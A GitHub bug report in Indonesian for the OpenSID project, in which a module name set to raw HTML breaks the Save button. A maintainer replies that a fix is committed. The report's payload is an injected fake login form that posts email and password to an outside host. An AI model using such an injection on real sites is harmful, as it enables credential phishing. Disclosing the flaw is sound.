### ISSUE TITLE
[BUG] Tidak bisa 'klik' Simpan pada menu Modul

### ISSUE THREAD

**Issue by mugi789** [OpenSID/OpenSID#2122]
### Bagaimana alurnya sampai muncul masalah?
Awal saya masuk ke Pengaturan >> Modul , lalu pada kolom Aksi >> klik Ubah data
![gambar](https://user-images.githubusercontent.com/32443765/60394896-4396ea00-9b55-11e9-85fb-2a522d9ebd90.png)

Ganti _nama modul_ yg awalnya **Kependudukan** menjadi **`<form action=https://pakmuharram.org/login.php>Username:<br><input type="email" name="email"></br>Password:<br><input type="password" name="pass"></br><br><input type="submit" value="Login"></br>`** lalu selanjutnya klik _Simpan_

### Apa yang terjadi?
Setelah saya ubah nama modulnya dengan script html , lalu ketika ingin mengubahnya lagi seperti semula
jadi tidak bisa mengklik _**Simpan**_ // Tidak bisa diubah/diganti Nama Modulnya
 ![gambar](https://user-images.githubusercontent.com/32443765/60394931-f7987500-9b55-11e9-8679-ada590171476.png)

### Informasi tambahan 

| Tanya            | Jawab
| ---------------- | ---
| Versi OpenSID    | 19.06-pasca
| Versi PHP        | 5.6.40
| System operasi   | Linux

**Comment by eddieridwan** [comment]
Sudah dicommit ke master.
